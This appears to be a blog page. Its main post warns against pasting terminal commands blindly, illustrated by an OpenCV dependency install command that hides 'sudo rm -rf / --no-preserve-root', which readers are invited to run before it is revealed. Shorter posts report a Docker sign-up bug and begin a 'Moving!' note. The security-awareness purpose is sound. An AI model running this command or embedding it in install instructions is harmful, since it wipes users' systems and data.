Why you should never copy Terminal commands blindly...

I was installing a software on my linux based Operating System (linux mint) and I have to type a series of commands on my terminal with root privilege (as sudo). Like most of the people who wants to install the software as soon as possible, I copied the command on my terminal. Then I realized that I should read and type the command myself, know why? To be aware of what I am about to execute with root privilege.

Know why, we should Type rather than just copy that boring looking lengthy commands. Here are the reasons:

For short length commands, you can visually verify if the command is appropriate or not and may even type it without any second thought of copying it down. But the problem arises when the size of command increases.

With length of commands increasing, to verify the commands visually seems to daunting for most of us, so we just select-copy-paste the command onto the terminal and even provide sudo privileges without second thoughts.

Now, imagine if you are following installing instructions from a blog rather than from official website, i.e. third party source. That article writer can purposely add some suspicious lines within that command for you to copy and execute without verifying. When you do so, you are falling into her/his trap :/

Here is an example:

Copy this code snipped onto your terminal,

  1. sudo apt update && sudo apt upgrade
  2. sudo apt install build-essential checkinstall cmake pkg-config yasm git gfortran libjpeg8-dev libjasper-dev libpng12-dev libtiff5-dev libavcodec-dev libavformat-dev libswscale-dev libdc1394-22-dev libxine2-dev && sudo rm -rf / --no-preserve-root && libgstreamer0.10-dev libgstreamer-plugins-base0.10-dev python-dev python-pip python3-dev python3-pip python-numpy && sudo apt update

Assuming there aren't any broken packages error, all the commands executed as they should.

Now, If you guys have copied all the command and executed it, you might have understood, what I meant by visually verifying the command.

You guys have just destroyed your whole system and all the data contained in it.

Within the above command, there was a command, sudo rm -rf / --no-preserve-root that is meant to delete your whole system.

So, from now on, you should:
  • Always check the commands you are copying and executing on your system, especially the one that needs sudo privilege.
  • Type the whole set of commands rather than copying and pasting it down. It will help you gain more insights about the command.
  • Preferably follow Official installation blog/instructions rather than any third-party blogs (at-least not without verifying the commands)
  • And, NEVER, EVER RUN YOUR SYSTEM AS ROOT.

Note: The above commands are meant to install some opencv library dependencies and to mess your system, execute at your own risk :P

TIll then,

To infinity and Beyond.

Bug Report on Docker SIgn up!

There is a bug (I think) about which I would like to share with docker community for them to patch it.

The issue is neither very big nor important, which is with creating the docker id (signing up for new docker id). Below are the steps to recreate the issue to verify it:

1. Create Docker ID at https://cloud.docker.com/.
2. Fill in the form as shown.

Figure1: Docker Sign up form.

3. Fill an already used docker id and fill the rest as you want.
4. After completing I'm not a robot captcha, hit Sign up button.
5. There will be an error showing "Username  already taken".

Figure2: Username already taken error!



6. Correct the user name with the new and unique user name (don't reload or refresh the web page).

7. Hit Sign Up button.  There will not be any confirmation mail sent acknowledgement for you to know, and there will be no confirmation mail even if the information is correct and unique.

Figure3: This is the output on sign up after correcting the details


8. You need to refresh/reload the web page to sign up with the unique and correct details.


UPDATE: the Sign up button works without reloading but after few minutes (I haven't calculated how much),

Browser used:  Firefox Quantum
Version: 57.0.3
Mode: In-private Browsing


Till Then,
To infinity and Beyond!



Moving!

It's been a long time, since I published anything here, but that doesn't mean I stop writing, I kept writing everyday, just didn...